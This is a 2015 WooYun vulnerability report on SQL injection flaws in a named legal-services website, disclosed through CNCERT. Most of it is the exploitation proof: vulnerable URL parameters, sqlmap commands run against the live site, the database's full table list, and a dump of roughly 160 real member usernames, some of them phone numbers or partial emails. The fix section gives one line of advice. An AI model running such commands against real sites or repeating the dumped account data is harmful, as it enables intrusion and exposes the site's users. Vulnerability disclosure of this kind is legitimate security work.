当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0116987

漏洞标题:某法务网站多处存在sql注入

相关厂商:cncert国家互联网应急中心

漏洞作者: 示云

提交时间:2015-06-02 07:37

修复时间:2015-07-20 18:16

公开时间:2015-07-20 18:16

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:5

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-02: 细节已通知厂商并且等待厂商处理中
2015-06-05: 厂商已经确认,细节仅向厂商公开
2015-06-15: 细节向核心白帽子及相关领域专家公开
2015-06-25: 细节向普通白帽子公开
2015-07-05: 细节向实习白帽子公开
2015-07-20: 细节向公众公开

简要描述:

多处页面存在sql注入,sql语句拼接未做处理,导致完全脱裤

详细说明:

多处页面存在sql注入
http://www.myfawu.com/product.php?type=
http://www.myfawu.com/other/focus.php?focusID=
http://www.myfawu.com/other/focus.php?page=1&focusID=
http://www.myfawu.com/news/cat.php?cat1=
http://www.myfawu.com/news/cat.php?cat1=&cat2=
http://www.myfawu.com/news/cat.php?cat1=&cat2=&cat3=
http://www.myfawu.com/news/industry_list.php?industryID=

漏洞证明:

python sqlmap.py -u http://www.myfawu.com/product.php?type=2 -D bbs --tables
Database: bbs
[103 tables]
+----------------------+
| bbs_access |
| bbs_activities |
| bbs_activityapplies |
| bbs_addons |
| bbs_adminactions |
| bbs_admincustom |
| bbs_admingroups |
| bbs_adminnotes |
| bbs_adminsessions |
| bbs_advertisements |
| bbs_announcements |
| bbs_attachmentfields |
| bbs_attachments |
| bbs_attachpaymentlog |
| bbs_attachtypes |
| bbs_banned |
| bbs_bbcodes |
| bbs_caches |
| bbs_creditslog |
| bbs_crons |
| bbs_debateposts |
| bbs_debates |
| bbs_failedlogins |
| bbs_faqs |
| bbs_favoriteforums |
| bbs_favorites |
| bbs_favoritethreads |
| bbs_feeds |
| bbs_forumfields |
| bbs_forumlinks |
| bbs_forumrecommend |
| bbs_forums |
| bbs_imagetypes |
| bbs_invites |
| bbs_itempool |
| bbs_magiclog |
| bbs_magicmarket |
| bbs_magics |
| bbs_medallog |
| bbs_medals |
| bbs_memberfields |
| bbs_membermagics |
| bbs_memberrecommend |
| bbs_members |
| bbs_memberspaces |
| bbs_moderators |
| bbs_modworks |
| bbs_mytasks |
| bbs_navs |
| bbs_onlinelist |
| bbs_onlinetime |
| bbs_orders |
| bbs_paymentlog |
| bbs_pluginhooks |
| bbs_plugins |
| bbs_pluginvars |
| bbs_polloptions |
| bbs_polls |
| bbs_postposition |
| bbs_posts |
| bbs_profilefields |
| bbs_projects |
| bbs_promotions |
| bbs_prompt |
| bbs_promptmsgs |
| bbs_prompttype |
| bbs_ranks |
| bbs_ratelog |
| bbs_regips |
| bbs_relatedthreads |
| bbs_reportlog |
| bbs_request |
| bbs_rewardlog |
| bbs_rsscaches |
| bbs_searchindex |
| bbs_sessions |
| bbs_settings |
| bbs_smilies |
| bbs_spacecaches |
| bbs_stats |
| bbs_statvars |
| bbs_styles |
| bbs_stylevars |
| bbs_tags |
| bbs_tasks |
| bbs_taskvars |
| bbs_templates |
| bbs_threads |
| bbs_threadsmod |
| bbs_threadtags |
| bbs_threadtypes |
| bbs_tradecomments |
| bbs_tradelog |
| bbs_tradeoptionvars |
| bbs_trades |
| bbs_typemodels |
| bbs_typeoptions |
| bbs_typeoptionvars |
| bbs_typevars |
| bbs_usergroups |
| bbs_validating |
| bbs_warnings |
| bbs_words |
+----------------------+
python sqlmap.py -u http://www.myfawu.com/product.php?type=2 -D bbs -T bbs_members -C username --dump
+-----------------+
| username |
+-----------------+
| 11111 |
| 123456ab |
| 13424158501 |
| 1432wyf |
| 15989142367 |
| 18294102539 |
| 18350280136 |
| 815545337@qq.co |
| admin |
| ailouyou1314 |
| ambearnet |
| andy |
| askar229 |
| bendi1014 |
| billtrj |
| chanren |
| chanren186qq |
| chanren256597 |
| chanrenqq2 |
| chenqiaoxia |
| chinapatent |
| chun |
| chunyu200 |
| cimonboy |
| cindyclc |
| colonel |
| coohoon |
| crystal121 |
| da1253723984 |
| dailingyan |
| damoxiaohe |
| diandian |
| disgreath |
| dsgfd |
| Fiona苑 |
| frelizh |
| gaoxiong |
| gaudisimo |
| gjmcgl |
| gwrshk |
| hc556 |
| hchc |
| hellofeiya |
| hkyd |
| houxiaobei |
| huihuancai |
| hukai |
| hukai007 |
| hushuangshuang |
| huxiangkang |
| hyacinth910516 |
| jen88724 |
| jenny |
| jennynet |
| jiaowei |
| Joanne |
| joi520 |
| jolo90 |
| juicypeach37 |
| jxchx |
| jxnclm |
| kele9131 |
| kidtiantian |
| lai_lai_qu_qu |
| lawyang |
| lawyer-qu |
| lawyer-ran |
| lina |
| linger |
| lingxfo |
| lion |
| lionelfu |
| liu-hao-1979 |
| liyuhua |
| lyh2001pc |
| Mable_yu |
| mangoear |
| matador |
| mfqun |
| myf214 |
| myfriend011 |
| nanbeiji |
| newouyang |
| new宇杰 |
| oydz |
| oydzh |
| oywyf |
| qingtian99 |
| rampage1988 |
| sara |
| SasaDaDa1 |
| selena0329 |
| Shirley |
| Shirley-夏 |
| shixingshun |
| sj6433777 |
| sjhtx1 |
| snjiaowei |
| songsong |
| sukiwood |
| sunnie |
| sushiqianglaw |
| taoxiao9958 |
| therethere |
| tomegh |
| ttescapist |
| vickymona |
| wangquan |
| wangying |
| WatagritaVor |
| wdfw |
| wendy |
| wfqun |
| WJSXDHD |
| wzhc903494823 |
| xhb705 |
| xhllq |
| xiaoliu |
| xiaozhubao |
| XXE-Share |
| yangyuxiashi |
| yglin2015 |
| yimily |
| yinll |
| ysjtfwb |
| yunchristina |
| yuxian_nju@126. |
| yves001 |
| zcmaidi |
| zfzj2015 |
| zhangxq |
| zhousanchuan |
| zmc007 |
| zyzhangjj |
| 东方未明 |
| 了凡先生 |
| 云淡风轻 |
| 依然下午茶915 |
| 信仰久而久之 |
| 北辰星2004 |
| 半山法务 |
| 可乐9131 |
| 可儿whp |
| 后山竹林 |
| 回天集团 |
| 宁静淡泊 |
| 小小菜鸟ly |
| 小小蕾小 |
| 小香如故 |
| 布衣123 |
| 杨小羊123 |
| 杨文峰1 |
| 沉着冷静小张 |
| 法务大咖 |
| 法务小晨 |
| 海林lynn |
| 熙攘123 |
| 犀利哥哥 |
| 用心下载你 |
| 疯人小朱 |
| 胡子0812 |
| 花心思1986 |
| 行者103123 |
| 诸葛曹操 |
| 诸葛流云 |
| 郑州小白 |

修复方案:

验证查询参数

版权声明:转载请注明来源 示云@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-06-05 18:14

厂商回复:

最新状态:

暂无


漏洞评价:

评论